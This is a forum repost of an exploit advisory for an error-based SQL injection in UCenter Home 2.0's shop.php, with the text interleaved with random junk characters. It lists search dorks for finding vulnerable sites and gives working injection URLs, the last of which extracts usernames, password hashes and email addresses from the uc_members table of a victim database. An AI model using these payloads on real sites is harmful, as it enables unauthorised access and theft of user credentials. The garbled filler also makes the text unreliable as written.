, t b c7 ?5 ]/ |3 L5 H__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ p& b0 H1 ?! ]" F' w/ i
% W0 g) K3 j; g) _. g
7 C/ O X5 t' Z' e( U8 y% B4 F
. \1 Y8 X9 F0 E# Q7 W* F; r*/ Author : KnocKout
5 V- B0 x/ `5 u0 R2 i. w/ v6 V& E& ?% [" m- [/ }) D
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers , N& z+ f& T( s3 W, V" `; }
1 s: z% E1 }* P$ j1 Y*/ Contact: knockoutr@msn.com + y- A2 }, N5 }4 [' U
/ v9 W& O& c$ ?*/ Cyber-Warrior.org/CWKnocKout
. Z, s8 w! M/ _2 [$ a' K
1 K- o* `9 C5 d# H D__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& }0 L" n2 j$ T, e
+ @$ j0 n( @# M* R/ E2 dScript : UCenter Home % u0 E+ `2 w, O6 h
# z, E5 q0 c z6 }
Version : 2.0
9 `: \/ \' c9 Q. k
: m6 N( m& ~$ z; C0 lScript HomePage : http://u.discuz.net/
! U5 B: t% @8 d5 q p. T4 f+ Q/ [% S3 G% ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; z" G# z- T1 ^ o7 P L& h' U/ G# U _& {9 d1 W
Dork : Powered by UCenter inurl:shop.php?ac=view
& M+ A% f- w' M; s! w B# s0 q( u
' n) Y# J7 [( T4 YDork 2 : inurl:shop.php?ac=view&shopid= ! C5 \/ v! G' N( Q0 t& W5 i
. @: A# Y, k) @* p, b
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , m ^1 V: I% a& p( s# {. I
' i H9 F" M& {& LVuln file : Shop.php 2 z2 V. D# w o: L6 p8 ~
/ E. D5 L6 Q6 x0 Z
value's : (?)ac=view&shopid= * ^" d8 O& e5 V! z. _( k
% }! V' G/ c8 \6 wVulnerable Style : SQL Injection (MySQL Error Based) , K Y- S% ] L( X
9 n$ T0 ]+ b% p, D5 r' E9 \# @: V
Need Metarials : Hex Conversion
3 z, t4 J9 V) s: T( {, a! ^) x0 l+ v0 r9 x" E8 B
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- e% Z/ G3 i) q8 K+ v" H4 R* V( D% D
Your Need victim Database name. : J) l; ^' E' Q- d- ?: f* p
3 f" i$ R/ B; h0 b. D) h! Gfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ! b9 M& f3 P6 t" V* {1 g
$ A' X9 c0 W2 I1 i2 L+ F..
, `. B! i- y# H3 x& M" \# v: `/ h0 F+ ]( F3 U2 X ?
DB : Okey. " D8 @) A; `) _6 e
3 F5 j! I" Z, M- g7 k1 q* iyour edit DB `[TARGET DB NAME]` % K+ T5 h; y, a3 P- b7 ]/ G
5 P/ n1 }/ q( r8 Q' i5 o7 b. C
Example : 'hiwir1_ucenter'
) D. M u+ e7 N3 d" u4 h8 f7 Q0 V
% e, T, ?" h4 w/ SEdit : Okey.
) p' D8 x( |5 u {
8 ]) p1 g- y2 ^4 J' @' QYour use Hex conversion. And edit Your SQL Injection Exploit.. ( N) d2 `/ ]2 [2 m* u0 m
6 e. F8 C2 D5 w5 P. ~3 N5 y
& E7 L& L7 ?! P
) P- ?" Z3 r: y5 a1 f- kExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 8 f: ^5 @0 x2 c$ \4 \" {! v
|
发表于 2013-2-27 21:31:31
收藏
支持
反对